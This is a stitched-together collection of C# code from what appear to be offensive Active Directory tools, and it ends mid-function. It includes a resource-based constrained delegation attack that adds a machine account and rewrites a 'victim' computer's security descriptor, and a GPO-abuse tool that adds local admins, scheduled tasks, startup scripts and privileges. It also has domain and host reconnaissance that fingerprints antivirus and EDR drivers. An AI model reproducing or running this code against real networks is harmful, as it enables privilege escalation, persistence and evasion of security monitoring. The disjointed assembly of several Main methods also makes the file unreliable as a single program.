private void StartListening()
{
string sMachineName = Environment.MachineName;
try
{
System.DirectoryServices.ActiveDirectory.Domain oDomain = System.DirectoryServices.ActiveDirectory.Domain.GetComputerDomain();
if (!String.IsNullOrEmpty(oDomain.Name))
{
sMachineName = sMachineName + "." + oDomain.Name;
}
}
catch { }
_ListenURi = "http://" + sMachineName + ":" + _ListenPort + "/" + Application.ProductName.ToString() + "/";
_Listener.Prefixes.Clear();
_Listener.Prefixes.Add(_ListenURi);
textBoxListenerURi.Text = _ListenURi;
try
{
_Listener.Start();
_Listener.BeginGetContext(new AsyncCallback(ListenerCallback), _Listener);
}
catch (Exception ex)
{
System.Windows.Forms.MessageBox.Show("Unable to start HTTP listener" + Environment.NewLine + "(are you running as administrator?)",
"Error", MessageBoxButtons.OK, MessageBoxIcon.Warning);
textBoxListenerURi.Text = "FAILED TO START LISTENER: " + ex.Message;
_ListenURi = "";
textBoxListenerURi.BackColor = Color.Red;
textBoxListenerURi.ForeColor = Color.Black;
}
}
public void FindLockedAccounts()
{
System.DirectoryServices.ActiveDirectory.Forest forest = System.DirectoryServices.ActiveDirectory.Forest.GetCurrentForest();
System.DirectoryServices.ActiveDirectory.DirectoryContext context = null;
foreach (System.DirectoryServices.ActiveDirectory.Domain thisDomain in forest.Domains)
{
string domainName = thisDomain.Name;
System.Console.WriteLine(domainName);
context = new System.DirectoryServices.ActiveDirectory.DirectoryContext(System.DirectoryServices.ActiveDirectory.DirectoryContextType.Domain, domainName);
} // Next thisDomain
//get our current domain policy
System.DirectoryServices.ActiveDirectory.Domain domain = System.DirectoryServices.ActiveDirectory.Domain.GetDomain(context);
System.DirectoryServices.DirectoryEntry root = domain.GetDirectoryEntry();
// System.DirectoryServices.DirectoryEntry AdRootDSE = new System.DirectoryServices.DirectoryEntry("LDAP://rootDSE");
// string rootdse = System.Convert.ToString(AdRootDSE.Properties["defaultNamingContext"].Value);
// System.DirectoryServices.DirectoryEntry root = new System.DirectoryServices.DirectoryEntry(rootdse);
DomainPolicy policy = new DomainPolicy(root);
//default for when accounts stay locked indefinitely
string qry = "(lockoutTime>=1)";
// System.TimeSpan duration = new TimeSpan(0, 30, 0);
System.TimeSpan duration = policy.LockoutDuration;
if (duration != System.TimeSpan.MaxValue)
{
System.DateTime lockoutThreshold = System.DateTime.Now.Subtract(duration);
qry = string.Format("(lockoutTime>={0})", lockoutThreshold.ToFileTime());
} // End if (duration != System.TimeSpan.MaxValue)
System.DirectoryServices.DirectorySearcher ds = new System.DirectoryServices.DirectorySearcher(root, qry);
using (System.DirectoryServices.SearchResultCollection src = ds.FindAll())
{
foreach (System.DirectoryServices.SearchResult sr in src)
{
long ticks = (long)sr.Properties["lockoutTime"][0];
System.Console.WriteLine("{0} locked out at {1}", sr.Properties["name"][0], System.DateTime.FromFileTime(ticks));
} // Next sr
} // End Using src
} // End Sub FindLockedAccounts
private static TimeSpan GetMaxPasswordAge()
{
using (System.DirectoryServices.ActiveDirectory.Domain d = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain())
using (DirectoryEntry domain = d.GetDirectoryEntry())
{
DirectorySearcher ds = new DirectorySearcher(
domain,
"(objectClass=*)",
null,
SearchScope.Base
);
SearchResult sr = ds.FindOne();
TimeSpan maxPwdAge = TimeSpan.MinValue;
if (sr.Properties.Contains("maxPwdAge"))
{
maxPwdAge = TimeSpan.FromTicks((long)sr.Properties["maxPwdAge"][0]);
}
return(maxPwdAge.Duration());
}
}
static void Main(string[] args)
{
if (args == null)
{
PrintHelp();
return;
}
String DomainController = "";
String Domain = "";
String MachineAccount = "";
String DistinguishedName = "";
String password_cleartext = "";
String victimcomputer = "";
var Options = new Options();
if (CommandLineParser.Default.ParseArguments(args, Options))
{
if ((!string.IsNullOrEmpty(Options.ComputerPassword) && !string.IsNullOrEmpty(Options.TargetComputer) && !string.IsNullOrEmpty(Options.ComputerAccountName)) || (!string.IsNullOrEmpty(Options.Cleanup) && !string.IsNullOrEmpty(Options.TargetComputer)))
{
if (!string.IsNullOrEmpty(Options.DomainController))
{
DomainController = Options.DomainController;
}
if (!string.IsNullOrEmpty(Options.Domain))
{
Domain = Options.Domain;
}
if (!string.IsNullOrEmpty(Options.ComputerAccountName))
{
MachineAccount = Options.ComputerAccountName;
}
if (!string.IsNullOrEmpty(Options.ComputerPassword))
{
password_cleartext = Options.ComputerPassword;
}
if (!string.IsNullOrEmpty(Options.TargetComputer))
{
victimcomputer = Options.TargetComputer;
}
}
else
{
Console.Write("[!] Missing required arguments! Exiting...\n");
//PrintHelp();
return;
}
}
else
{
Console.Write("[!] Missing required arguments! Exiting...\n");
PrintHelp();
return;
}
String cleanup = Options.Cleanup;
// If a domain controller and domain were not provide try to find them automatically
System.DirectoryServices.ActiveDirectory.Domain current_domain = null;
if (DomainController == String.Empty || Domain == String.Empty)
{
try
{
current_domain = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain();
}
catch
{
Console.WriteLine("[!] Cannot enumerate domain.\n");
return;
}
}
if (DomainController == String.Empty)
{
DomainController = current_domain.PdcRoleOwner.Name;
}
if (Domain == String.Empty)
{
Domain = current_domain.Name;
}
Domain = Domain.ToLower();
String machine_account = MachineAccount;
String sam_account = "";
if (MachineAccount.EndsWith("$"))
{
sam_account = machine_account;
machine_account = machine_account.Substring(0, machine_account.Length - 1);
}
else
{
sam_account = machine_account + "$";
}
String distinguished_name = DistinguishedName;
String victim_distinguished_name = DistinguishedName;
String[] DC_array = null;
distinguished_name = "CN=" + machine_account + ",CN=Computers";
victim_distinguished_name = "";
DC_array = Domain.Split('.');
foreach (String DC in DC_array)
{
distinguished_name += ",DC=" + DC;
victim_distinguished_name += ",DC=" + DC;
}
victim_distinguished_name = victim_distinguished_name.TrimStart(',');
//this check is lame but cannot make the switch work with CommandLine :)
if (cleanup == "true")
{
SetSecurityDescriptor(Domain, victim_distinguished_name, victimcomputer, null, true);
return;
}
if (cleanup != null)
{
Console.WriteLine("Cleanup must be set to \"true\"\n. Exiting...");
return;
}
Console.WriteLine("[+] Domain = " + Domain);
Console.WriteLine("[+] Domain Controller = " + DomainController);
Console.WriteLine("[+] New SAMAccountName = " + sam_account);
Console.WriteLine("[+] Distinguished Name = " + distinguished_name);
System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389);
System.DirectoryServices.Protocols.LdapConnection connection = null;
connection = new System.DirectoryServices.Protocols.LdapConnection(identifier);
connection.SessionOptions.Sealing = true;
connection.SessionOptions.Signing = true;
connection.Bind();
var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] {
new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account + "." + Domain),
new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account),
new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"),
new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + password_cleartext + "\"")),
new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"),
new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/" + machine_account + "." + Domain, "RestrictedKrbHost/" + machine_account + "." + Domain, "HOST/" + machine_account, "RestrictedKrbHost/" + machine_account)
});
try
{
connection.SendRequest(request);
Console.WriteLine("[+] Machine account " + machine_account + " added");
}
catch (System.Exception ex)
{
Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-MachineAccountQuota limit.)");
Console.WriteLine("[-] Exception: " + ex.Message);
return;
}
// Get SID of the new computer object
var new_request = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "(&(samAccountType=805306369)(|(name=" + machine_account + ")))", System.DirectoryServices.Protocols.SearchScope.Subtree, null);
var new_response = (System.DirectoryServices.Protocols.SearchResponse)connection.SendRequest(new_request);
SecurityIdentifier sid = null;
foreach (System.DirectoryServices.Protocols.SearchResultEntry entry in new_response.Entries)
{
try
{
sid = new SecurityIdentifier(entry.Attributes["objectsid"][0] as byte[], 0);
Console.Out.WriteLine("[+] SID of New Computer: " + sid.Value);
}
catch
{
Console.WriteLine("[!] It was not possible to retrieve the SID.\nExiting...");
return;
}
}
SetSecurityDescriptor(Domain, victim_distinguished_name, victimcomputer, sid.Value, false);
}
static void Main(string[] args)
{
if (args == null)
{
PrintHelp();
return;
}
String[] user_rights_list =
{
"SeTrustedCredManAccessPrivilege",
"SeNetworkLogonRight",
"SeTcbPrivilege",
"SeMachineAccountPrivilege",
"SeIncreaseQuotaPrivilege",
"SeInteractiveLogonRight",
"SeRemoteInteractiveLogonRight",
"SeBackupPrivilege",
"SeChangeNotifyPrivilege",
"SeSystemtimePrivilege",
"SeTimeZonePrivilege",
"SeCreatePagefilePrivilege",
"SeCreateTokenPrivilege",
"SeCreateGlobalPrivilege",
"SeCreatePermanentPrivilege",
"SeCreateSymbolicLinkPrivilege",
"SeDebugPrivilege",
"SeDenyNetworkLogonRight",
"SeDenyBatchLogonRight",
"SeDenyServiceLogonRight",
"SeDenyInteractiveLogonRight",
"SeDenyRemoteInteractiveLogonRight",
"SeEnableDelegationPrivilege",
"SeRemoteShutdownPrivilege",
"SeAuditPrivilege",
"SeImpersonatePrivilege",
"SeIncreaseWorkingSetPrivilege",
"SeIncreaseBasePriorityPrivilege",
"SeLoadDriverPrivilege",
"SeLockMemoryPrivilege",
"SeBatchLogonRight",
"SeServiceLogonRight",
"SeSecurityPrivilege",
"SeRelabelPrivilege",
"SeSystemEnvironmentPrivilege",
"SeManageVolumePrivilege",
"SeProfileSingleProcessPrivilege",
"SeSystemProfilePrivilege",
"SeUndockPrivilege",
"SeAssignPrimaryTokenPrivilege",
"SeRestorePrivilege",
"SeShutdownPrivilege",
"SeSyncAgentPrivilege",
"SeTakeOwnershipPrivilege"
};
bool Force = false;
String Domain = "";
String DomainController = "";
String UserAccount = "";
String GPOName = "";
String task_name = "";
String author = "";
String arguments = "";
String command = "";
bool AddLocalAdmin = false;
bool AddImmediateTask = false;
String ScriptContents = "";
String ScriptName = "";
bool AddStartupScript = false;
bool AddUserRights = false;
String[] user_rights = null;
var Options = new Options();
if (CommandLineParser.Default.ParseArguments(args, Options))
{
if (args.Length == 0)
{
PrintHelp();
return;
}
if (Options.Help == true)
{
PrintHelp();
return;
}
// check that only one attack was specified
if (((Options.AddLocalAdmin && Options.AddImmediateTask) && Options.AddUserRights) && Options.AddStartupScript)
{
Console.WriteLine("[!] You can only specify one attack at a time.\n[-] Exiting\n");
return;
}
//check that the name of the GPO to edit was provided
if (string.IsNullOrEmpty(Options.GpoName))
{
Console.Write("[!] You need to provide the name of the GPO to edit.\n[!] Exiting...\n");
return;
}
GPOName = Options.GpoName;
// check that the necessary options for adding a new local admin were provided
if (Options.AddLocalAdmin)
{
AddLocalAdmin = true;
if (string.IsNullOrEmpty(Options.UserAccount))
{
Console.WriteLine("[!] To add a new local admin the following options are needed:\n\t--UserAccount\n\n[-] Exiting...");
return;
}
UserAccount = Options.UserAccount;
}
// check that the necessary options for adding a new startup script were provided
if (Options.AddStartupScript)
{
AddStartupScript = true;
if (string.IsNullOrEmpty(Options.ScriptName))
{
Console.WriteLine("[!] To add a new startup script the following options are needed:\n\t--ScriptName\n\t--ScriptContents\n\n[-] Exiting...");
return;
}
if (string.IsNullOrEmpty(Options.ScriptContents))
{
Console.WriteLine("[!] To add a new startup script the following options are needed:\n\t--ScriptName\n\t--ScriptContents\n\n[-] Exiting...");
return;
}
ScriptContents = Options.ScriptContents;
ScriptName = Options.ScriptName;
}
//check that the necessary options for adding a new scheduled task were provided
if (Options.AddImmediateTask)
{
AddImmediateTask = true;
if (string.IsNullOrEmpty(Options.TaskName) || string.IsNullOrEmpty(Options.Author) || string.IsNullOrEmpty(Options.Arguments) || string.IsNullOrEmpty(Options.Command))
{
Console.WriteLine("[!] To add a new immediate task the following options are needed:\n\t--Author\n\t--TaskName\n\t--Arguments\n\t--Command\n\n[-] Exiting...");
return;
}
task_name = Options.TaskName;
author = Options.Author;
arguments = Options.Arguments;
command = Options.Command;
}
// check that the necessary options for adding new rights were provided
if (Options.AddUserRights)
{
AddUserRights = true;
if ((string.IsNullOrEmpty(Options.UserAccount)) || string.IsNullOrEmpty(Options.UserRights))
{
Console.WriteLine("[!] To add user rights the following options are needed:\n\t--UserAccount\n\t--UserRights\n[-] Exiting...");
return;
}
UserAccount = Options.UserAccount;
user_rights = Options.UserRights.Split(',');
// check if the rights passed as arguments are valid
foreach (string p in user_rights)
{
if (!user_rights_list.Contains(p))
{
Console.WriteLine("\n[!] The user rights provided were not valid. Rights are case sensitive!\n[!] Exiting...");
return;
}
}
}
if (!string.IsNullOrEmpty(Options.DomainController))
{
DomainController = Options.DomainController;
}
if (!string.IsNullOrEmpty(Options.Domain))
{
Domain = Options.Domain;
}
if (Options.Force)
{
Force = true;
}
}
else
{
Console.Write("[!] Unknown argument error.\n[!] Exiting...\n");
return;
}
System.DirectoryServices.ActiveDirectory.Domain current_domain = null;
if (string.IsNullOrEmpty(Domain))
{
try
{
current_domain = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain();
}
catch
{
Console.WriteLine("[!] Cannot enumerate domain.\n");
return;
}
}
if (string.IsNullOrEmpty(DomainController))
{
DomainController = current_domain.PdcRoleOwner.Name;
}
if (string.IsNullOrEmpty(Domain))
{
Domain = current_domain.Name;
}
String[] DC_array = null;
String distinguished_name = null;
distinguished_name = "CN=Policies,CN=System";
DC_array = Domain.Split('.');
foreach (String DC in DC_array)
{
distinguished_name += ",DC=" + DC;
}
Domain = Domain.ToLower();
Console.WriteLine("[+] Domain = " + Domain);
Console.WriteLine("[+] Domain Controller = " + DomainController);
Console.WriteLine("[+] Distinguished Name = " + distinguished_name);
// Add new local admin
if (AddLocalAdmin)
{
try
{
NewLocalAdmin(UserAccount, Domain, DomainController, GPOName, distinguished_name, Force);
}
catch (System.Exception ex)
{
Console.WriteLine(ex.Message + "[!] Exiting...");
return;
}
}
// Add new scheduled task
if (AddImmediateTask)
{
NewImmediateTask(Domain, DomainController, GPOName, distinguished_name, task_name, author, arguments, command, Force);
}
// Add new startup script
if (AddStartupScript)
{
NewStartupScript(ScriptName, ScriptContents, Domain, DomainController, GPOName, distinguished_name);
}
// Add rights to user account
if (AddUserRights)
{
AddNewRights(Domain, DomainController, GPOName, distinguished_name, user_rights, UserAccount);
}
}
public static void Main(string[] args)
{
string outbindings;
string host;
if (args == null || args.Length == 0)
{
List <string> ComputerNames = new List <string>();
System.DirectoryServices.ActiveDirectory.Domain domain = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain();
string currentdom = "LDAP://" + domain.ToString();
DirectoryEntry entry = new DirectoryEntry(currentdom);
DirectorySearcher mySearcher = new DirectorySearcher(entry);
mySearcher.Filter = ("(objectClass=computer)");
mySearcher.SizeLimit = int.MaxValue;
mySearcher.PageSize = int.MaxValue;
foreach (SearchResult resEnt in mySearcher.FindAll())
{
string ComputerName = resEnt.GetDirectoryEntry().Name;
if (ComputerName.StartsWith("CN="))
{
ComputerName = ComputerName.Remove(0, "CN=".Length);
}
ComputerNames.Add(ComputerName);
}
mySearcher.Dispose();
entry.Dispose();
foreach (string computer in ComputerNames)
{
Console.WriteLine("Getting bindings for " + computer + ":");
Console.WriteLine("");
PingReply pingReply;
bool error = false;
using (var ping = new Ping())
{
try
{
pingReply = ping.Send(computer);
}
catch
{
Console.WriteLine("No DNS");
pingReply = ping.Send("localhost");
error = true;
}
}
if (pingReply.Status == IPStatus.Success && error != true)
{
outbindings = GetCsvData(computer);
Console.WriteLine(outbindings);
Console.WriteLine("");
Console.WriteLine("");
}
else
{
Console.WriteLine("Computer not accessible");
Console.WriteLine("");
Console.WriteLine("");
}
}
}
else
{
host = args[0];
outbindings = GetCsvData(host);
Console.WriteLine(outbindings);
}
}
static void Main(string[] args)
{
String DomainController = "";
String Domain = "";
String MachineAccount = "testNew";
String DistinguishedName = "";
String password_cleartext = "123456789";
System.DirectoryServices.ActiveDirectory.Domain current_domain = null;
if (DomainController == String.Empty || Domain == String.Empty)
{
try
{
current_domain = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain();
}
catch
{
Console.WriteLine("[!] Cannot enumerate domain.\n");
return;
}
}
if (DomainController == String.Empty)
{
DomainController = current_domain.PdcRoleOwner.Name;
}
if (Domain == String.Empty)
{
Domain = current_domain.Name;
}
Domain = Domain.ToLower();
String machine_account = MachineAccount;
String sam_account = "";
if (MachineAccount.EndsWith("$"))
{
sam_account = machine_account;
machine_account = machine_account.Substring(0, machine_account.Length - 1);
}
else
{
sam_account = machine_account + "$";
}
String distinguished_name = DistinguishedName;
String victim_distinguished_name = DistinguishedName;
String[] DC_array = null;
distinguished_name = "CN=" + machine_account + ",CN=Computers";
DC_array = Domain.Split('.');
foreach (String DC in DC_array)
{
distinguished_name += ",DC=" + DC;
victim_distinguished_name += ",DC=" + DC;
}
Console.WriteLine("[+] Domain = " + Domain);
Console.WriteLine("[+] Domain Controller = " + DomainController);
Console.WriteLine("[+] New SAMAccountName = " + sam_account);
Console.WriteLine("[+] Distinguished Name = " + distinguished_name);
System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389);
System.DirectoryServices.Protocols.LdapConnection connection = null;
connection = new System.DirectoryServices.Protocols.LdapConnection(identifier);
connection.SessionOptions.Sealing = true;
connection.SessionOptions.Signing = true;
connection.Bind();
var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] {
new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account + "." + Domain),
new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account),
new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"),
new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + password_cleartext + "\"")),
new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"),
new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/" + machine_account + "." + Domain, "RestrictedKrbHost/" + machine_account + "." + Domain, "HOST/" + machine_account, "RestrictedKrbHost/" + machine_account)
});
try
{
connection.SendRequest(request);
Console.WriteLine("[+] Machine account " + machine_account + " added");
}
catch (System.Exception ex)
{
Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-MachineAccountQuota limit.)");
Console.WriteLine("[-] Exception: " + ex.Message);
return;
}
}
static void Main(string[] args)
{
try
{
if (args.Length < 2)
{
Usage();
return;
}
Dictionary <string, string> arguments = new Dictionary <string, string>();
foreach (string a in args)
{
int i = a.IndexOf(":");
if (i > 0)
{
arguments[a.Substring(1, i - 1)] = a.Substring(i + 1);
}
}
if ((!(arguments.ContainsKey("computer")) && !(arguments.ContainsKey("pass")) && !(arguments.ContainsKey("fakecomp"))) || (!(arguments.ContainsKey("cleanup")) && !(arguments.ContainsKey("fakecomp"))))
{
Usage();
return;
}
string orEmpty(string key) => arguments.ContainsKey(key) ? arguments[key] : "";
String TargetDC = orEmpty("dc");
String Domain = orEmpty("domain");
String OwnedComp = orEmpty("computer");
String PasswordClear = orEmpty("pass");
String Fake = orEmpty("fakecomp");
String Cleanup = arguments.ContainsKey("cleanup") ? arguments["cleanup"] : "false";
// If a domain controller and domain were not provide try to find them automatically
System.DirectoryServices.ActiveDirectory.Domain current_domain = null;
if (TargetDC == String.Empty || Domain == String.Empty)
{
try
{
current_domain = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain();
if (TargetDC == String.Empty)
{
TargetDC = current_domain.PdcRoleOwner.Name;
}
if (Domain == String.Empty)
{
Domain = current_domain.Name;
}
}
catch
{
Console.WriteLine("[!] Cannot enumerate domain, please specify with /domain and /dc flags.");
return;
}
}
Domain = Domain.ToLower();
String machine_account = Fake;
String sam_account = "";
if (Fake.EndsWith("$"))
{
sam_account = machine_account;
machine_account = machine_account.Substring(0, machine_account.Length - 1);
}
else
{
sam_account = machine_account + "$";
}
String distinguished_name = "";
String victim_distinguished_name = "";
String[] DC_array = null;
distinguished_name = "CN=" + machine_account + ",CN=Computers";
victim_distinguished_name = "CN=" + OwnedComp + ",CN=Computers";
DC_array = Domain.Split('.');
foreach (String DC in DC_array)
{
distinguished_name += ",DC=" + DC;
victim_distinguished_name += ",DC=" + DC;
}
if (Cleanup != "false")
{
SetSecurityDescriptor(Domain, victim_distinguished_name, OwnedComp, null, true);
return;
}
Console.WriteLine("[+] Domain = " + Domain);
Console.WriteLine("[+] Domain Controller = " + TargetDC);
Console.WriteLine("[+] New SAMAccountName = " + sam_account);
Console.WriteLine("[+] Distinguished Name = " + distinguished_name);
System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(TargetDC, 389);
System.DirectoryServices.Protocols.LdapConnection connection = null;
connection = new System.DirectoryServices.Protocols.LdapConnection(identifier);
connection.SessionOptions.Sealing = true;
connection.SessionOptions.Signing = true;
connection.Bind();
var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] {
new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account + "." + Domain),
new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account),
new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"),
new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + PasswordClear + "\"")),
new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"),
new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/" + machine_account + "." + Domain, "RestrictedKrbHost/" + machine_account + "." + Domain, "HOST/" + machine_account, "RestrictedKrbHost/" + machine_account)
});
try
{
connection.SendRequest(request);
Console.WriteLine("[+] Machine account " + machine_account + " added");
}
catch (System.Exception ex)
{
Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-MachineAccountQuota limit.)");
Console.WriteLine("[-] Exception: " + ex.Message);
return;
}
// Get SID of the new computer object
var new_request = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "(&(samAccountType=805306369)(|(name=" + machine_account + ")))", System.DirectoryServices.Protocols.SearchScope.Subtree, null);
var new_response = (System.DirectoryServices.Protocols.SearchResponse)connection.SendRequest(new_request);
SecurityIdentifier sid = null;
foreach (System.DirectoryServices.Protocols.SearchResultEntry entry in new_response.Entries)
{
try
{
sid = new SecurityIdentifier(entry.Attributes["objectsid"][0] as byte[], 0);
Console.Out.WriteLine("[+] SID of New Computer: " + sid.Value);
}
catch
{
Console.WriteLine("[!] It was not possible to retrieve the SID.\nExiting...");
return;
}
}
SetSecurityDescriptor(Domain, victim_distinguished_name, OwnedComp, sid.Value, false);
}
catch (Exception e)
{
Console.WriteLine("{0}", e.Message);
}
}
static void Main(string[] args)
{
Console.WriteLine("=================================================================");
Console.ForegroundColor = ConsoleColor.Cyan;
Console.WriteLine(" Situational Awareness Tool ");
Console.ForegroundColor = ConsoleColor.White;
Console.WriteLine("=================================================================");
string user;
try
{
user = Environment.UserName;
Console.WriteLine("Current user context: " + user);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
string domain;
try
{
domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
Console.WriteLine("Domain: " + domain);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
string computername;
try
{
computername = Dns.GetHostName();
Console.WriteLine("Hostname: " + computername);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
try
{
WindowsIdentity ident = new WindowsIdentity(Environment.UserName);
int initcount = 0;
foreach (IdentityReference group in ident.Groups)
{
string c = Convert.ToString(group);
if (c == "S-1-5-32-544")
{
initcount++;
}
}
if (initcount > 0)
{
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("[!] User {0} in local admin group", Environment.UserName);
Console.ForegroundColor = ConsoleColor.White;
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[-] User {0} NOT in local admin group", Environment.UserName);
Console.ForegroundColor = ConsoleColor.White;
}
Console.WriteLine("");
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
try
{
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("[+] Local Admin Members:");
Console.ForegroundColor = ConsoleColor.White;
PrincipalContext local = new PrincipalContext(ContextType.Machine);
var lclgroup = GroupPrincipal.FindByIdentity(local, "Administrators");
PrincipalSearcher searchlcl = new PrincipalSearcher();
PrincipalSearchResult <Principal> rslts = lclgroup.GetMembers();
foreach (Principal k in rslts)
{
Console.WriteLine(k.SamAccountName);
}
Console.WriteLine("");
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
try
{
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("[+] List of user accounts on {0}:", Dns.GetHostName());
Console.ForegroundColor = ConsoleColor.White;
PrincipalContext mycontext = new PrincipalContext(ContextType.Machine, Environment.MachineName);
UserPrincipal userp = new UserPrincipal(mycontext);
PrincipalSearcher searchp = new PrincipalSearcher();
searchp.QueryFilter = userp;
PrincipalSearchResult <Principal> presult = searchp.FindAll();
foreach (Principal m in presult)
{
try
{
Console.WriteLine(m.SamAccountName);
}
catch
{
}
}
Console.WriteLine("");
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
try
{
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("[+] Internal Addresses found:");
Console.ForegroundColor = ConsoleColor.White;
NetworkInterface[] netinf = NetworkInterface.GetAllNetworkInterfaces();
foreach (NetworkInterface netinf2 in netinf)
{
Console.WriteLine("{0}: {1}", netinf2.Name, netinf2.GetIPProperties().UnicastAddresses[1].Address);
}
Console.WriteLine("");
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
try
{
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("[+] Running Processes:");
Console.ForegroundColor = ConsoleColor.White;
Process[] listall = Process.GetProcesses();
foreach (Process prc in listall)
{
Console.WriteLine("{0} ({1})", prc.ProcessName, prc.Id);
}
Console.WriteLine("");
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
try
{
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("[+] Running Services:");
Console.ForegroundColor = ConsoleColor.White;
ServiceController[] svcs;
svcs = ServiceController.GetServices();
foreach (ServiceController scitem in svcs)
{
if (scitem.Status == ServiceControllerStatus.Running)
{
Console.WriteLine("{0}: {1}", scitem.ServiceName, scitem.DisplayName);
}
}
Console.WriteLine("");
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
try
{
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("[+] Antivirus Name and ProductState Search Results:");
Console.ForegroundColor = ConsoleColor.White;
ManagementObjectSearcher wmiinfo = new ManagementObjectSearcher(@"root\SecurityCenter2", "SELECT * FROM AntiVirusProduct");
ManagementObjectCollection wmiinfo2 = wmiinfo.Get();
foreach (ManagementObject antivirus in wmiinfo2)
{
Console.WriteLine("{0}: {1}", antivirus["displayName"], antivirus["productstate"]);
}
Console.WriteLine("");
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("[+] Endpoint Detection and Response Search Results:");
Console.ForegroundColor = ConsoleColor.White;
bool arch = Environment.Is64BitOperatingSystem;
if (arch == true)
{
DirectoryInfo driversdir = new DirectoryInfo(@"c:\windows\sysnative\drivers");
FileInfo[] lista = driversdir.GetFiles("*.sys");
foreach (FileInfo file in lista)
{
if (file.Name == "FeKern.sys" || file.Name == "WFP_MRT.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("FireEye found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "eaw.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Raytheon Cyber Solutions found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "rvsavd.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("CJSC Returnil Software found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "dgdmk.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Verdasys Inc. found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "mbamwatchdog.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Malwarebytes found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "edevmon.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("ESET found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "SentinelMonitor.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("SentinelOne found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "edrsensor.sys" || file.Name == "hbflt.sys" || file.Name == "bdsvm.sys" || file.Name == "gzflt.sys" || file.Name == "bddevflt.sys" || file.Name == "AVCKF.sys" || file.Name == "Atc.sys" || file.Name == "AVC3.SYS" || file.Name == "TRUFOS.SYS" || file.Name == "BDSandBox.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("BitDefender found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "HexisFSMonitor.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Hexis Cyber Solutions found!");
Console.ForegroundColor = ConsoleColor.White;
}
